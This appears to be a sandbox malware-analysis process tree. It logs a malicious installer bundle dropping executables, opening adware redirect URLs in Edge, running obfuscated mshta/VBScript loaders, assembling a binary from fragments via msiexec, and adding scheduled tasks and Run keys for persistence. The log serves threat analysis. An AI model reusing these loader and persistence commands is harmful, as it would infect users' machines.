C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:44016
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵PID:17056
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:15192
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵PID:19664
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:19932
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵PID:21468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:21812
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵PID:28040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:23116
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵PID:43176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:7612
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵PID:48680
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:48520
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵PID:6828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:31664
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵PID:8224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:8808
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵PID:10080
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:31812
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵PID:50172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:32688
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵PID:34436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:35488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9a-b7182-491-d25bb-707117f366f76\SHigaeloxica.exe"C:\Users\Admin\AppData\Local\Temp\9a-b7182-491-d25bb-707117f366f76\SHigaeloxica.exe"12⤵PID:6208
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exe /eufive & exit13⤵PID:48692
-
C:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exe /eufive14⤵PID:49716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 49716 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10436
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:50052
-
C:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exeC:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exe /qn CAMPAIGN="654"14⤵PID:47072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe & exit13⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exeC:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe14⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe"C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe" -u15⤵PID:9312
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exe /mixfive & exit13⤵PID:6632
-
C:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exe /mixfive14⤵PID:8984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8984 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:32356
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\511zxmyo.pfo\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
PID:8384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exe /eufive & exit13⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exe /eufive14⤵PID:6428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 23615⤵
- Program crash
PID:8416
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exeC:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exe /qn CAMPAIGN="654"14⤵PID:30988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe & exit13⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exeC:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe14⤵PID:6300
-
C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe"C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe" -u15⤵PID:8244
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exe /mixfive & exit13⤵PID:8140
-
C:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exe /mixfive14⤵PID:49868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 49868 -s 24015⤵
- Program crash
PID:11212
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chv35b53.tln\autosubplayer.exe /S & exit13⤵PID:8992
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"9⤵PID:6004
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:6748
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:4720
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "8EqV4eNR78bCYwfbybj8MsVz.exe"12⤵
- Kills process with taskkill
PID:5548
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"9⤵PID:7376
-
C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe" -u10⤵PID:5564
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FVFTOIzhXOwuCYMlRx7WbAzn.exe"C:\Users\Admin\Pictures\Adobe Films\FVFTOIzhXOwuCYMlRx7WbAzn.exe"9⤵
- Loads dropped DLL
PID:7312 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:6472 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵PID:11416
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
PID:6552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:3596
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Tr_Mw4Yk4p1Re1ouatYAWQUu.exe"C:\Users\Admin\Pictures\Adobe Films\Tr_Mw4Yk4p1Re1ouatYAWQUu.exe"7⤵PID:5904
-
-
C:\Users\Admin\Pictures\Adobe Films\DvVQQq1XPMV9rCht2f5DtVr7.exe"C:\Users\Admin\Pictures\Adobe Films\DvVQQq1XPMV9rCht2f5DtVr7.exe"7⤵PID:5164
-
-
C:\Users\Admin\Pictures\Adobe Films\VM2skHGFpeBDBysR6622fBC8.exe"C:\Users\Admin\Pictures\Adobe Films\VM2skHGFpeBDBysR6622fBC8.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6040
-
-
C:\Users\Admin\Pictures\Adobe Films\K0TibwmFldhZ549RofY1erc4.exe"C:\Users\Admin\Pictures\Adobe Films\K0TibwmFldhZ549RofY1erc4.exe"7⤵
- Executes dropped EXE
PID:5124 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5532
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Hj5Pq1vV39n8G1DTpop2wdl2.exe"C:\Users\Admin\Pictures\Adobe Films\Hj5Pq1vV39n8G1DTpop2wdl2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"7⤵
- Executes dropped EXE
PID:496 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵PID:2216
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe" ) do taskkill -im "%~NxK" -F9⤵PID:6384
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵PID:7144
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵PID:7008
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
- Executes dropped EXE
PID:1512
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵PID:6616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵PID:7276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵PID:6672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵PID:6556
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
PID:6756
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "nXZzPjm8z9HP4_SUYbwTPDKm.exe" -F10⤵
- Executes dropped EXE
- Kills process with taskkill
PID:3792
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\M35Lp9gfDfkC86gCoe6z36z0.exe"C:\Users\Admin\Pictures\Adobe Films\M35Lp9gfDfkC86gCoe6z36z0.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2916
-
-
C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"7⤵
- Executes dropped EXE
PID:5740 -
C:\Users\Admin\AppData\Local\Temp\is-VE0ST.tmp\4kw4eKu9gndEHqJKFw6yErfF.tmp"C:\Users\Admin\AppData\Local\Temp\is-VE0ST.tmp\4kw4eKu9gndEHqJKFw6yErfF.tmp" /SL5="$6014C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6176 -
C:\Users\Admin\AppData\Local\Temp\is-IFBHT.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IFBHT.tmp\ShareFolder.exe" /S /UID=27109⤵PID:6732
-
C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe"C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe" /VERYSILENT10⤵PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\f6-2b359-4c1-2cb81-16e1ec8b1f461\Loraebaesura.exe"C:\Users\Admin\AppData\Local\Temp\f6-2b359-4c1-2cb81-16e1ec8b1f461\Loraebaesura.exe"10⤵PID:3304
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:7160 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:7592
-
-
